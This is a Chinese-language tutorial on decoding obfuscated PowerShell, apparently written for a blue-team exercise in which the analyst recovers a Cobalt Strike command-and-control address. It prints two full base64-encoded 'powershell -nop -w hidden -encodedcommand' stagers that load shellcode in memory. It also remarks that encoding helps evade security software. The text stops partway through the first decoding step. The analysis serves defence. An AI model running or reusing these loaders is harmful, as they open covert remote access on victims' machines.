Powershell混淆代码的解码过程 - 皮卡丘

知识点

• 微软对高版本的PowerShell做了些处理，提供了包括Transciption、ScriptBlock等多种方式来记录PowerShell的活动日志，因此基于PowerShell的攻击需要在运行时对其代码进行混淆编码。
• 首先让我们来看一下PowerShell的“-EncodedCommand”参数。
• -EncodedCommand
  Accepts a base64-encoded string version of a command. Use this parameter
  to submit commands to Windows PowerShell that require complex quotation
  marks or curly braces.
• 如PowerShell上述的使用说明，“EncodedCommand”是其一个命令，旨在对复杂字符串进行封装以便PowerShell在命令行中进行执行。你可以利用此命令对关键字符串进行隐藏，以躲避防护软件的探测。

• 知己知彼 我看下它是如何生成的，
  ### 理解cs powershell command

• 直接利用cs生成powershell command上线命令。
  

• 生成payload内容：

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWAA3ADMATwBpAFMAQgBQACsASABQADgASwBQAHEAUgBLAHEAVABXAGUARQBjADAAbQBlADcAVgBWAGkAdwBxAEsAQwBrAG4ARQAzADcAbABVAGEAcABnAFoARQBRAE0ARAB3AGkAQwBRADIALwAzAGYAcgAwAEgATgBaAFcAKwB6ADkAMgA3AFYAKwA3ADUAVwBVAFEANAB6ADMAVAAzAGQAegB6AHoAZAAwADUAaQBVAFgANQBnADgAZABEAEQAWABmAFUASwBGAGkAeABrAE4ASQA4AGQAbgBRAHEATgBVAE8AdQAvADYARwBoAGMAKwBDADEALwBLAHAAWABYAE0ATQBNACsAbgA4ADgARwBUAFQAZgBsAFQARQBQAHIANABDAFIARQBTADAAaQBnAFMALwBpAHkAZAAzAGEARQBRAGUAVQBMAGwAZgBJAC8AQwBKADgAOABuAHMAVQB1AHIAUQB2AEcAUwBDADEASQBTAGgAMQBRADgATwB5AHUAZABGAFYATQB4AGkAOQBDAGEAUABqAEgARQBuAFQAMQA5ADgAaQBqAGYAKwBDAFMAQwBqAFMAbwBQAGMAaABCADAAZgBRADgANQA3AFAASABUAHAAMAA0AGMAaABwAFQAeAB3ADMAdQB0AFIANwBrAGMAUgBkAFMAegBYAEkAZABHAEYAVgBIADQASwBzAHcAMwBOAEsAUQBYAHQAOQBhAFcAWQBpADcAOABLAFoAdwAvADEAWABxAHUAYgB5AEgAMwBLAEoAWgAxAEUATgA1AEEAUQBEAEkAagArAGQAcgBJAHgAeQBpAFAAbwBHAFkARwByAHMATQByADUAVAAvACsASwBJAHMAUABGADUAZQBQAE4AVwBVAFgASQB6AGUAcQBsAE0AMABzADQAdABTAHIARQBkAGMAdABpADgASQAzAE0AZAA5AHcAawBnAFcAMABVAHQAWQBkAEgAUABxAFIAdgArAGEAMQB1AGMATwBrAFIAbQAxAGEAZQBHADgAVQB6AHUAcwBIADMAOAB2AGkATQBUAEkANwBRAEIARABIAHoANABQAE0AcgBSADUAMABLAG0AVQBZADMAZwBFADIAOABnAEgARABjAGwAVgA0AHkAUABkADcAZQBIAHcAVQB2AHIAeAA2AE0ANAA0AFoAZAB6AHgAYQAwAHgAaQBuAG8AUgArAFkATgBOAHcANwBtAEUAYQAxAFAAbQBMAEUAcABXAE8ANgBCAHIAVgB5AEIATQBmAEgANwBMAEkASQBUAG8AUwBVAHgAeQBFAFQAVAByADYAQQAzAHQANQAvAHAAcABWAHoARgByAHQAdQBGAGUAdwArAC8ASwByAGQAeAA0AHAAQgBrAHgATwA0AHYANgBwAFUAZQBhAHMARQBVAG4AYwA4AEYASwB0AEgAVAB2AHcASwBIAEgAcgBCAG0ANABNADUAQwBPAGMASAA3ADkAKwBRAFMANABUAGYARAB3AFEAVABTADkAOQBLADcAMQBDAFYAVQBKAGYAYQBpAE4ATQBuAEQAdgBpACsANABXAHIAcAA3AE8AeQBoAEcARgBLAEkAcAAzAEwAbgBSADAANgBoADkAMQBtAG8AVgB3AFUAZABuAEUARABjAEQANwBQADgATwBDAGQAaABUAE0AWABIAHYAOAAvAG4AcwBPADEASgBNADYAcgArADEATgBEAGwAUwBlAHUAbwBjAHoAaQBlAGcAeAArAGYAaABZAGUAWgA3ADUARABIADAAcABsAFkATwByAEkAbgBuADMAKwB5AFkAcwBjAGwATgBNAHoAWABmADUANABOAFgAYgBwADIARwBPADEAbQBEAEgAawBPAFAAaABHACsAOAB0ADYAWgAwAGIAVgBMAEMAegB4AHEASgB6AEUARAAvAEsAeQBVAGoAdwB1AFUAZABJAC8AbwBsAEgATgBBAEgAMwA1AFUAVQB6AHkASAB2ACsAcQAyAEQAOAA3AEoARwBNADQAOQBBAHEAKwBBAEUAdQBMADMAegBoAHoATwBzAEYATABXAG0ARQA0ADkAdwBPAC8AdwBEAGoAUQA5AFgAMABPAGEAMABaAFAAMABNAGIAVwB5ADAAKwA3ADUAZQA4ADcAbABqAG8AdQBpAHEAQwByAGMAeABaAEQAbgB1AEMAcQBZAEYATABtAFUAVgBBAFcAWgBSAGMANQB4AFMAWQA2ADUAWAB3AHoATABmADcAdQByAHgAeQA1ADMATQBJAHIANAB5AGQAeQBqACsAQQA2AGsAeAA2ADAANwBQAG8ATwBNAGkAVABHAGMATABzAEEAdwBNAFEATwBLAEgAZQBUAG0AcQBGAFMARgB2AGsATgBvAE8AegBNAGQAKwArAFIAQwArAFYAMQBNAE8AcwBoADEASQBlAFgAQQAwAGgANwBPAEIARwBaAHkATABFAHkAZQBjAHkAWQBrADEAWAAvAHkAUQA2AHkAWgBsAEcAdABlADQARgBJAFAAcABJAHMAcQBwAEwAcgBJAGgAcABwAHoAegBLAGkAQwBiAHMAaQBtAHAAUAB3AHYAYgBwAC8AeQA1AEoAQQBVAE8AVgBZAG4AawBOADQANABEAFEAUQB3AFgAWgA5AFgAaABaAGsAVABjAHEAaAByADUAZQBvAFAAeABQAHYAdgAzAFAAdQArAHgASAB6AG4AWgBpAGUAawB4ADQATwBzAEYASQBuADQAMABNADUANABuAGkANgBGAEoATQA0AHYAbAA4ACsAdgBXAEIAYgBJAGgAUgB4AFEAVQAwAFAAZgBhADYATwBJAFgAagBYAE4AbwBvAHgAVgB5AHQASgAxAHYATgBNAHkAZgBYAHQALwBGAGYAYQBVAHYAZAByAGYAOQBaAFUASgBQAEgAdAA0AHAASgAyAHEAagBFAGEARABjAGQAQQBlAGoANwBBAFMAMwA5ADcAMQA2ADQATwAxAGQAbgAvAGQAYgBjAFoASgByAE0AVwBUAGQAbAAxAFMANgB5AEQAMwBzAHUAcwBwAGEAMgAxAC8ANgB5ADgAdgBZADYAOQA1AFMAUQBKAHQAYgA4AEIAYwA5AEgASABYAGoANwByAGEAdgBpAHYAMwBHAHoAdABmAHYAYgBLAGQAbQA2AE8AZABnAC8ANgA5AGwAVgB4AGEAQwAwADMAOQBhAFAAWABVAFoAbgA4AFcAcQBiAGwAOABYADkAdQAzADEAVgAzAG4AeABvAGYAeABiADkAcQArADQAdwA5AEEANwAvAG8AcQBZAE8AMgBFAE4ASwBrAHkAdQBLAEsATABFAFUANABrAGYAawAyAFIAbgBXAGIARAAyAFEAZQB6AGYAdABtAGIAWgBjAFoAbwBwAGcAUwBHAHkAYwBqAEkAdQByAHgAWABCADgAWgBMAFEAKwBGAHAAbgBmAFQASABkAGEASgBFAEsAegBMAGIASwBkAEsAZABOAFEAdwBnAFQAawAyAHkAegBTAHMAMgB5AEUAeQB6AG4AZQBGAG4AbgB1AFcAeAA0ADcANAB4AEkAcwBQAGQAZABZAHUAOABOAEQATABWAGEAQQBJAE8AcQBaAG4AcABtACsAVQBWAFMAZgBGAEMAVABmAEQAQwBHAEcAWAA5AHAAZABFAEQAdQA3AHQANABiAGoAZgA3AHUAaQBtAEIAYgBaAE8AawBDAcwA3ACsATAA2AFYAawBNAGEAQQByAHgAcQBEAGQASgBXADAASABHAHQAQgBkAG0AUQBlAHAASQBUAEoAdAA2AFMAeABTAGsAagBTAGMAcABGADMANAA4AGsAMgBDAFQAdQA5AGEASwBDAGwAcQAwAGgAbQBlAGsAKwBUAFYAdgBkAGoAVgA3AGwAZABQAG8AOQA3AGsAeABsAGUAeQBZADIAVwBQAHAAOABHAGQANQBPADYAcABxAHQASgBmAFMASQBuAFgASgA0AG8AcgBjAG0AOQBTADQAYgAzADAANQB0AGUAVAB6AFoAaQAzAEEAcwA4AE8AWQAwAE0ASgBiAFcANwBCAE0ANQBqAFgARQArAG4AVQA5AG4AZwBKAE4ASABuADMAYgBHADIAbABDAFUAeQBOAHAAOQBKAGIAcQArAHcAQQBUAHIANwA1AFYAeABOAHIAZgA0ADQAVwBUAEYAbABPAEgASwBlAHQANgBxAFgAZABIAEMAeQAyAGkANgBaADAAVgBTAGwAbQB4AGUANgBpAE8AWgBxAHcAbAAvAFcAOQAvADUAMAAyAFoATwBIAEsAbgBCAGwANQBRAFgAMgBrAGkAbQAzAHUARQA4AGMAYQAwADQAYwBQAE0AZQAzAFMAKwA5AFMAUQBtAHkAMgB3ADQAdABWADAAbQBYAEUAdwAzADEAOAB1ADUAbwBIACsANQBXAHQAOQBWAEcAeQBDAFQAdgBtAC8AeAArAHoAWgBXAFAAdwBRAHQAdgBrAE4AeQB5ADUASAA5AFUATgBIAG0ARwBwAFAAbABSADcAYgBSAHYAcwAwADMAWgBqAHQAVgB2ADIAQgBtAG0AWAB0AFMAWAB3AGwAUwAyAFoAeQByAHIAZQBnAEoATgBHAGMASQBtAFkAMgBzAEIAeQBTADEAcgBCAFcAdABlAGIANwBhAHoARwBzAHQATgB1AFIAQgBwAEsALwBvAEUASAA4AEwAegBlAFEAbQAwAEMAUABEAFgAbgB4AGsAaAA3AEEAVAA3AFgAbwA2ADMAVwAwAEwAZABFADQAUgA4ADMAVQByAGMASABQAEUAdwA4ADQAQQB2AHcAeQBQAG4AQQBCAHMAawB1AEEAcAA1AG0AZQBsAGYATABqAEoAeQByAEsAVQBkAGgAdQArAEQAcQA1AGQAcgBkAGQAZQA2AGQANQB0AEQAYQB6AHEATABWAHgANgBZAGUARAB5AFgAKwBnAHAAVwBOAGIAaQBnAGIAMwArAGkAbAA4AEQALwBHAFYAcAA0AGYAOABIAHoATwBxADkASABhAEQANgBHAC8AUwBQAE0ANwArADMAYwBCAC8AaQA5AGMATAByAHoAVwBHADYAZwB5AFUATQBEAHkAKwBRADgAZgB4AFAAegBlAGYAMQAxADUATwBFADgAZgBUADMAMwBhADYALwB1AEYAbABZAEkAMQBxAFoAWABYAHIAbQBKAGwAagA5ADUAVQByAEoAOAAxAFAAegBvAEsAbwB3ADEAeQBvAFoASgBCAEEAMwBPADYAZgBsAFEALwBWAEkAOQB0AHkASgAzAHYANQBCAHEAVgB5AHYAdQBkADgAegBNAE4ARwBYAFcAaABxADQAUwArADgAMQBTADAAWgBkAGYAMQBjAGQANAA0AC8AYQBTAEQAZwBUAGIAdQAwAEYAdwA5AHcAdQBVADAAaABhAEgAVQBlAEgAYwBrAEMAcQArAEMAMABDADAAZABZAHIATABpADkAYgBwAG8ATABvADQAUgBuAG4AcQBzAGsAKwBDAG4AVAB5AHMASQByAC8AbwBHAHgAQgBGAGwATgB0ADkAVQBoAFgAbwBxADEAZQB2ADEALwBMADkAWgBGADAAdQAvAEQAawB2AEgARAA3AEwASwBxADcAbABxADMAbAB5ADkAOABlAFQAdABUAG0ANgB4AGsAMwBoAEUAUAA0AHkAWgBSAC8AKwBIAEIALwBEAGQAcAB2ADgAWgAyAGgAeQA4AG8AagA5ADcAaABhADUAdwA2AEgAMgA4AHgARgBMADUAUwA2AG0AawByAFkAVQAzADgANQBIAHoAQQBsADgAZgBkAEMAZABjAEYAOQB5AEwAZwBPAGIAOABZAHUAdABiADgASwBsAFMAMwBMADIAVgBjAHkAUQBLAG0AcgBJAFEAegBwAEgAdwBUAGIAaQBBADgATwBSAEkAYQBzAEQAMwBTAG0AagBIACsAVQBVAHMASABEADYALwB2AGcAbwBKAGMAZwA2AEsAWAA0AFUAeAB4AFIAVABhADUANAB1AEIAYgB3AEYATABLAGYAUgBUAHUAZQBuAEMAUwBDADQATQBjADMAOABCAGsAdwBzAC8ANQA4ADgATgBBAEEAQQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBu

• 这是cs的无文件落地上线形式，利用powershell直接将shellcode加载进内存执行。逐步的分析这条命令。
  • -nop => not profile 不加载powershell配置文件
  • -w hidden => 隐藏窗口
  • -encodedcommand => 将base64后的字符串当作powershell命令执行

案例

• 在一次Hvv行动中，蓝军捕获了以下代码，需要解密出cs连接的服务器地址和端口

%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWAA2ADMATwBpAFMAaABiAC8ASABQADgASwBQAHEAUgBLAEwAVQAyAEMAagA1AGcANABXADEATgAxAFYAVQBCAFEAUQBCAFQAZgB1AGEAawBVAGoAeABaAFIAbwBIAGsAMABLAE4ANgBaAC8ALwAwAGUAVQBIAE0AegBPADUAbgBkAHEAZABxADEAaQByAEsANwBPAGMALwBmAGUAZgBSAEIAUgBlAFIATwBKAGEARgB0AEUAQQBtAGIAaQBMAHEAYgBvAHoAQwB5AHMAVQBmAFYAQwA0AFYAYgBCAGcAdQBFACsAawByADkAVQBTAHgAcwBZAHMAOABnADIAWABHADIAZQBMAE0AUQBlAGYATgBEAGIATAB4AHAAcABoAG0AaQBLAEsATAArAEsAdAB3AG8AVwBxAGkANQBWAE8AawAyADAAYwBJADMARgA1AHUAeABnADYAcABVAHYAcwBrAEkAawBSAG0ASABxAEgAeAB6AFUANwBqAEoAagAyAEkAdgAwAGoAYgBvAHoAZABPAEkAbgBhAEEAMwBGADUARQB0AE4AaQBOAFEAVgBIAHIAcAArAEQANgBEAFgAYwAzADIAWAByADkAOAA2AGMAVgBoAGkARAB4AHkAMwB0AC8AMwBFAGUAbABFAEUAWABKADEAeAAwAFoAUgBxAFUAeAA5AG8AeABaAGIARgBLAEsANwBrAGIANQBEAEIAcQBIACsAbwBtADcAZgA3AHYAcwBPADEAagBYAG4AUQBwAGIAMgBOAEcATQBMAEQAbgBVADgATQAzAHMAbgBZAGsAUABMAFAATABoAFgAZgBjAGMAbQBwAGUASwBmAGYAeABiAEwATAAzAGUAMQAxADMAcwAyAGkARABVAG4ASwBoAFgAVgBOAEMATABJAHYAVABjAGQAcAAxAGkAbQB2AHAAYwB6AGgAZABQAFUAUgA2AFcAaQBaAEIAcwBoAGoAdgBDAEcAMwBDADkAcwByADEARwAvAG4AKwBYAFcAeQA3AG4AeAAwAHQAbgAyAFkAdgBuAGkAbQBlAFYAcgA0AE0AZQB2AG4AYwB5AGsAbgBuAGwASwBSAFYAZwBxAGcARQAzAG4AagBHAEcAeABTAHIAMQBrACsAbAA1AGUAWAA2AGsALwAzAHEAMgBaAHgAQgA2AHgAWABYAFEAdgBlAEEAUwBGADIARgBkAFIAbQBOAGcARwBpAHUANQA1AHoAVABNAGQATgBFAEUAYgBZAEMAdABHAEUARAA3AFAASwBwAGIAQgBpAEIAQwBSAE8AUABTAG8AcQB5ADMAQQBsACsAQQA5AEsAdAAxADYAcwBlAE4AVQBRAGUANwBMADcAOABwADkATABjAG4AbwBjAEEAWAAzAGQANQBsAEsASAA1AG0AQQBTAGkARgBoAHUAWAByAEoAaQBkACsAQgBRADgAcgB6ADUAaQB3AE8AMwBQAG4ASgArAGcALwBKAFYAWQBiAGYAVAB3AGwAVwBMAG4AdwB2AGYASgBLAHEASgBuAEsAUQBwAFIASAAwAFIAZwBEAGYARAA3AGwAYQB1AEwAbAA1AHkAWgBjAEkALwBDAGsAcABPAEwASgB6AHYAcQA4AFUAWABhAFUAawBNAEUASQBqAE8ARQB5AHoAYwBFADcARABHAEoAVgBmAC8ANABuAFAAVwBlADIAVgBNADYAcgArAFUAbABEAHQAeQBuAFgAaABPAFkAZgBuAGIATQBkAFgANgBtAFcATwBiAGYATwAxAGMARgBNAHUAWABMAEkAbgBPADMALwBUAFkAOQBzAHgAVQBaAGkAOQAvADMAVQAxAE0ARwBoAGoAZQA0AGgASgBQAGMAMgAxAGoAVwB2AEMAbAB6ADYATABHAGQAbwA0AEsATQBmAGoALwBrAG8AbQBnADUAMgBsADQAdQBVAEYATQBwAGsATABPAHMAVQBNADAASgBlAGYAMgBWAGoAWABKAHUAKwA4ADMAYgBOAHgASABRAFAAaQBIAG8ARgBWAGsAQgBMAGwASAA0ADAANQB4ADcAQgBVAEYARAB3AEoAdQBZAEQAZgBlAFEAOQBwAGUAcgB1AEIATQBrAE4AWAA2AGsAdABwAHAAVgBmAHQAMgBUADcATAA1AFoANgBqAFIAVgBHAFYAVQBtAEsAbwBjADYATgBLAHEAVQBoAHoAawBGAG0AbABPAGwANQBrAFgAMQA1ADEAWQBvAEwAegBaAGYARQBmAGMANgBYAFkASQBiAGEAaABSAGUAUQBxADcAcgBYADgAQwBhAFEAWAAxAFQAMwBzAFEAYwBYAEUAQgBrAFEAWABZAEoAaQBxAFAAagBKAHMAegBjAGwAUQBxAFYASwA4AGIAYQBKAHUAcQB0AHIAVwAxAFkAVABpAHAANQBqADAATgBNAGUAQgBrAGcATgBKAEMAYwBRAEUAVABqAEkAcwBWAEoATABsAFQARwBoAFcALwB6ADAALwB5AHYAYwBxAEkAbwBMAHIATwA4AGcARgA2AHIAdwBMAGMAWQA1AG0AUQBjACsANQBWAEYAUwBlAGIAcABxAEYAegBPAEoALwBNAFAAdABhAEoAKwBlAGkAeQBMAEMANgBnAHYAVABCAGEARQBnAEEAMQBjAEcAawBTAHMAMwB0AGsARQBCAGYASwAxAFoALwBTAHIAegAvAHoAYgB3AGYAVwA4AHcAUABaAHYAWgBDAGQAQQBsAGsASwBTAC8ARQBsADIANQBLAHMAbgBMAEoASwBZADMAcwBjAHYAbgA2AGoAbQBXAE8AWABFAGcAQQBOAFMANwBFAGIAbABlAEwAVQBLAHUAcAA1AG0AMgBzAFYARwB3ADgAeAA0AEcAUQBTAHIAdAB4AEsAKwB5AHoAQwBjAGMASABQAEQAdQBGAEoANABHAG4ARQBYAEMAcwBLAEEANABtAGYAbgBjAGkARwBtAHcAOABVAG4AaAA2AHMAQgBIAEcAegAwAHcAegBQAHMAUgBDAFAATwAzAFMARABZADQARwB1AGwAUABRAFoAegBkAEMATQBzAEsAcgBXAHUAdwAyAGEANgBZAHYASgBEAEsAYwBSAFUAOABCAEgAegBGAEMAdwBuAFQANABlAG8AQwA1AGwAbQBXADMATAAzAEwATwAvAEcAUAA5AFUATgBPAFgAQQB2AGUAawA5ADcAawBtAFAANAArADQAagBKADQAWABrAGkANABYADkATgBvAFkAMQBnADkAQwAwAHMATQBEADQASAB0AHUAKwBWADcAMwBZAEQAWQBSAE8AMgBpAGgAcABXAGcAYwBHAHUAUQBaAGEAZABZAHgASABjADQAcgBLAGwAMwByAHoAMQBOAFoAbgBMAE8AKwByAEgAcQBtAHEATgBmAEcAMwBFAEEAKwAxAFYAUAB3AEMAZgB4AFMARwAvAHkARQBOAHUARgBSAGoAMAA1AHQAZwBhAGQARwBPAHcAcgA0AHoARgAvAFUARgBRAFAARABHAHcAdwBFAGYAcABDAHEAagA1AFkAdABwAFAATABCAG8AQQBrAGQAaABDAGUAbgBvAGEAeABQAGEAZgBBAE0ALwBIAEkAVABNAEQAbQBxAHEAVABSAHAAdABzAHkAagBzAGUAUQBPAHgAbABJAFcAVQAzADQAbAA5ADAARgBIAEUAQwArAHMASgBpACsATAArAE4AagBaAEMAYQAyAFEAVQBWAFgAegBwAEUANgBQAE4AYgBXADIAZABoAEoAdABhAGIAUwA5AFEANgA1AGYATgBZADgASABjAHgAYQBOAEIAbABPAHkAYQBpAGkAYQAyADAAeABUAHIANgBVAEsATwArAEUAbwBHAGoANgBaAEwAdwBlAHQAVQBFAHQANwB2AG0AZwBqAHYAYgBzAGgAbQBkAHkAQgB1AEwAWQBHAGIAUgBiAFcATABEAG4AUwBxAGoAcABKAFQAZABEAHIAOABGAE4AbQBDAEgAcQA5AG4AaQBTAEIARAA5AG8AagB0ADkAcQBqAGgAagBKAGMAeQBDAGUAagAwAFIAVwBOAE4AQgBUAEEARAAyAFgAWQBzAGsASAAyAE0ANQBFAGEAYwBNADcAMAAxADQAOABtAE8AOQB1AHAANwBBAEcAYgBnAHMAWABpAHcAWABCAHAAdABaAGEAUAB3AFUAbgBoAG4AWgBvADkAcQB1AGwAeAB2AHoASwBQAGUANgAyAFEAKwBCADcAbQBtADcAWABBAHEAbABmAEEATwBkAFAAdgAxAEsAZgBtAGIASQBrAGQAdgBrAEkARwBEACsANQBzADEASAByAFUAMAAvAGoAQgBQAEQANwBJAHcAQgAwAFIAMQBuAG0AbwBLAGEANgAvAFEATAA0AHoAbwBqAGQAcwBxAE0AcgAxAEcAYgB1AGUATQBPADYAQQBuAGUAeAByAHkALwA1AFkAagBxAGUAYwBNADUAegBTADcAUgA3AFQAWABjAG4AcwBRAFIATABIADcASABFADAAbwB3AGQATABkAGMAOABwAGsANgAzAEYANgBGADQAMwBXAEYAdQBTAHgAawB5AGsAVgBhAGMAeABHAFUANQBuAHAAagBUAG4ATwBvAHkAKwBOAEIAaAB1AFQASwB2ADkAagB0AHkAWQB6AFgAdwArAGsANQBmAEwATwBGAHIATQBhAG4ARQBNADEAbAB1ADgATQBoAHIAbQAxAGgAagBqAGUASwBnAHEAegBiAGsAZgBjACsAcgB3AGEAUwBLADEAVgBpAHYATQBMAHEAeABIAFcAVwBtAHAANwBUADAAegBTAFoAKwBTAFcAcQBYAHQAdABKAGEASgB0AGwAbgB2ACsAOAA5AE4ATABuAEEAbgBzAFQAbQBXAEoAVgA2AGUASQAxAFoAcQBMAHgAUgBtAEYAaQByADkAVQA1AGUAdgBrAC8AWABhAGwALwBaAGEANQBMAFcAUwBQAGgAdgA0AHMAagArAGIANwBlAHkAdABQAGYAYgAyAGsASABnADQARwBUAHoATwBEAHIASwA4ADYASgBLAGwAdQBlAGgAdQBCADAAKwBDAEsAZwA3AFgAUQBhAHQAegBXAE0AbQA0AFYAMgBIAG8AcgBiADcAcgBIAHAALwBkADkASQBqAEcAegBsAE8AMABhADIAKwBSAEkAZABhAEcAKwAwAEUAOABxADcAdAA2AHgAVwBHADIAeQB0AEsAYQBWADgAWQBLAHIANgBkAHkAZQByAFEAVwBkAGIARgBqADkAcABkAEQAcQBiAC8AcgBIAEMAYgBNAFkATQBOAEgALwBuAFQAagB1AHkAZAA5AHUAdABuADUAZgBXADAAZABJAG8ANQBPAFAARwAvAGsASwByAE8AdwBWAHgAbgBqAFYAUwBCAEwAYwB6AEoAegA5AG4AaAB5AGUAbABEAFcAagBqAEoAZAByAEMAdQAxAGoAYQBpADIAUgBpAEcAeQBWAGwATwB6AGYAdwBwAFkATABuAEUATgBsAHIARAAxADUASQBpAE0AcAAyAEIATABGAHMASgBPAGIAWQA4AFcAMQBoAEoAeQBjAGUALwBzAEkASQA5AFAAawBOAE0AaQBQAEQAdQBoAE0AUgBGAFIAMAB6AHcAYwBJAGMAZQBpAEEAYwA1AHEAWgBTAGMAawBmAG0AbwBNAFEAOQBaAGsAbwAxADAASAA5AGcAWQAvAEYAeQBWADkARQBSAHoATQBVADkAMgBQAEkAZQB5AGEAdABSAGYAaQBIAHQAUwA0ADMAawBjAFYAUgBnAHoASQBFACsAUwBkAHMATwB4AGIAOQBLAFIALwBvAEgAWABXAGcAcABqAFoAZQBkADEAWgBXAGYAZgBhADQAQgBEAG0AawBXAE4AMgB4AC8AKwBMAGcAdgA4ADcAaAAxAEQAdgAvAFEAbQA2AEUAagBTADgANwBMAHgAUwBLAFcAZAB6AHcAdgB1AGIAbAA5AHYAagA2ADMAVwB1AGUAOQAvAGYANgBVAGUAUQAxAG4AagBNAGUAbAAzACsASgB0AEUAKwBkAEwAaABmAEQAVQB1AFMARgBrAFoAYgB6AFkASABPAEIAdwBQAFAAOQBiAHIAaQBjAE0AaABkAHgAaABZAEYAMgB4AGwASABxAGYAVAA1AHAATAAxAEgAbwBZAGMAYwBtAEUASgBoAFQAcgAwADIAKwBZADcAagBZAEMATQBiAHQASAA0AHgAOABjAEQAWQBkAHgANwBHAFgAdQBFAHkAbQA4AEcAeQBVAGYAOQAwAFYAYQBiAGUAQwBXAEcANgBPAHYAdQBrAHgANQB0AE4AUABvAHgAYwBQAEwAegBPAFoARgBmAEMATAAxAC8AVwA0AEYANwAxAEEANABnAGkAOABpAHkAeQByAFYATAAwAHMAVQBIAFQAZABQAGIAZgBwAE0AdQBGADMANABlAGwAaAAvADIAMAA5AEMANgB1AG0AZwAxAGoASAB5AHoANQBxAE0AbgBKAE4AWgBVAHYANgBJAGUAeAA1ADYATAAvAFkAdwBCACsAVQBQAHIAZgBvAGMAMwBBAHkAKwBlADUAZAArAGgAeQBnAHoANwBIAHEAMQB3AG8ALwBsAEUAbwBDAEIAdgBxAHcAMwBsAGsAbgArAEIAcgBCAFEAWABVAGMANQA1ADcARQBkAEYAQwBjAHIAZgBEAE8AbgB6AGEANQBIAGQAMQA2AFYAWQByAFUAdwBLADcAcABHADQAMQA2AGoAdAAxAEIAKwA1ADEAbwBrAFkAZAB2AG0AOQBDAEsAOAA0AHUAYgB1AHIAOAB1AGYAYQBOAE8AbQBqADIAbQBmAEUAYgBOAFUARQBHAGcAbgBIADcAYgBvAEIAMQB5AEYASQBFADgAMQBjAG0ATwBoAGUAUwBFAGMAUABaADMANABXAEQAVwBDAGoALwBEAFEAQQBBACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQ

base64解密（一）

• bash64 第一次解密：

echo -n "需要解密的代码" | base64 -D

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAAAK1X63OiShb/HP8KPqRKLU2Cj5g4W1N1VUBQQBTfuakUjxZRoHk0KN6Z//0eUHMzO5ndqdq1irK7Oc/fefRBReROJaFtEAmbiLqbozCysUfVC4VbBguE+kr9USxsYs8g2XG2eLMQefNDbLxpphmiKKL+KtwoWqi5VOk20cI3F5uxg6pUvskIkRmHqHxzU7jJj2Iv0jbozdOInaA3F5EtNiNQVHrp+D6DXc32Xr986cVhiDxy3t/3EelEEXJ1x0ZRqUx9oxZbFKK7kb5DBqH+om7f7vsO1jXnQpb2NGMLDnU8M3snYkPLPLhXfccmpeKffxbLL3e113s2iDUnKhXVNCLIvTcdp1imvpczhdPUR6WiZBshjvCG3C9sr1G/n+XWy7nx0tn2YvnimeVr4MevncyknnlKRVgqgE3njGGxSr1k+l5eX6k/3q2ZxB6xXXQveASF2FdRmNgGiu55zTMdNEEbYCtGED7PKpbBiBCROPSoqy3Al+A9Kt16seNUQe7L78p9LcnocAX3d5lKH5mASiFhuXrJid+BQ8rz5iwO3PnJ+g/JVYbfTwlWLnwvfJKqJnKQpRH0RgDfD7lauLl5yZcI/CkpOLJzvq8UXaUkMEIjOEyzcE7DGJVf/4nPWe2VM6r+UlDtynXhOYfnbMdX6mWObfO1cFMuXLInO3/TY9sxUZi9/3U1MGhje4hJPc21jWvClz6LGdo4KMfj/komg52l4uUFMpkLOsUM0Jef2VjXJu+83bNxHQPiHoFVkBLlH405x7BUFDwJuYDfeQ9peruBMkNX6ktppVft2T7L5Z6jRVGVUmKoc6NKqUhzkFmlOl5kX151YoLzZfEfc6XYIbahReQq7rX8CaQX1T3sQcXEBkQXYJiqPjJszclQqVK8baJuqtrW1YTip5j0NMeBkgNJCcQETjIsVJLlTGhW/z0/yvcqIoLrO8gF6rwLcY5mQc+5VFSebpqFzOJ/MPtaJ+eiyLC6gvTBaEgA1cGkSs3tkEBfK1Z/Srz/zbwfW8wPZvZCdAlkKS/El25KsnLJKY3scvn6jmWOXEgANS7EbleLUKup5m2sVGw8x4GQSrtxK+yzCccHPDuFJ4GnEXCsKA4mfnciGmw8Unh6sBHGz0wzPsRCPO3SDY4GulPQZzdCMsKrWuw2a6YvJDKcRU8BHzFCwnT4eoC5lmW3L3LO/GP9UNOXAvek97kmP4+4jJ4Xki4X9NoY1g9C0sMD4Htu+V73YDYRO2ihpWgcGuQZadYxHc4rKl3rz1NZnLO+rHqmqNfG3EA+1VPwCfxSG/yENuFRj0